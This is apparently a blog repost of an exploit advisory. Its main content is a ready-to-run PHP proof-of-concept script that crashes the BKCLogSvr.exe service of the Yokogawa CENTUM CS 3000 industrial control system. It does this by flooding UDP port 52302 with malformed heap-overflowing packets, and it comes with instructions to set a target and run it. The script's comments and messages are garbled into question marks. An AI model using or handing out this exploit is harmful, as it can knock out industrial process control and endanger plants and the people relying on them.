Latest Tech

Latest Posts

Yokogawa CENTUM CS 3000 R3.08.50 Buffer Overflow / Denial of Service

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 215
Yokogawa CENTUM CS 3000 R3.08.50 Buffer Overflow / Denial of Service
Yokogawa CENTUM CS 3000 R3.08.50 Buffer Overflow / Denial of Service
=============================================================================================================================================
| # Title : Yokogawa CENTUM =============================================================================================================================================
| # Title : Yokogawa CENTUM CS 3000 R3.08.50 Heap Buffer Overflow vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.yokogawa.com/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: BKCLogSvr.exe service on Yokogawa CENTUM CS 3000 system, exploiting Heap Buffer Overflow vulnerability to cause Denial of Service (DoS) by sending malformed UDP packets.

Opens UDP connection to port 52302.

Sends malformed packets that cause buffer overflow.

Sends multiple packets to ensure attack execution.

Closes connection after sending.

(Related : https://packetstorm.news/files/id/180485/ Linked CVE numbers: CVE-2014-0781 ) .

[+] save code as poc.php.

[+] Set target : line 3

[+] PayLoad :

<?php
// ??????? ???????
$target = "192.168.1.100"; // ?????? ?????? ?????
$port = 52302;
$rlimit = 10; // ??? ????? ???? ???? ???????

if ($rlimit < 2) {
die("??? ????? ?????? ????????? ??? ????? ?????? ??? DoS.\n");
}

// ????? ?????? ???????
$test = pack("V", 1024); // ??? ??????
$test .= "AAAA"; // ?????? ??? ??????
$test .= "SOURCE\x00\x00"; // ??????
$test .= str_repeat("\x00", 8); // ??? (Padding)
$test .= str_repeat("B", 1024 - strlen($test)); // ????? ???????

// ????? ???? UDP
$socket = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
if (!$socket) {
die("??? ????? ???? UDP: " . socket_strerror(socket_last_error()) . "\n");
}

echo "????? $rlimit ??? ??? $target:$port...\n";

// ????? ?????
for ($i = 1; $i <= $rlimit; $i++) {
echo "????? ?????? $i/$rlimit...\n";
socket_sendto($socket, $test, strlen($test), 0, $target, $port);
}

// ????? ???????
socket_close($socket);

echo "?? ??????? ?????!\n";
?>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.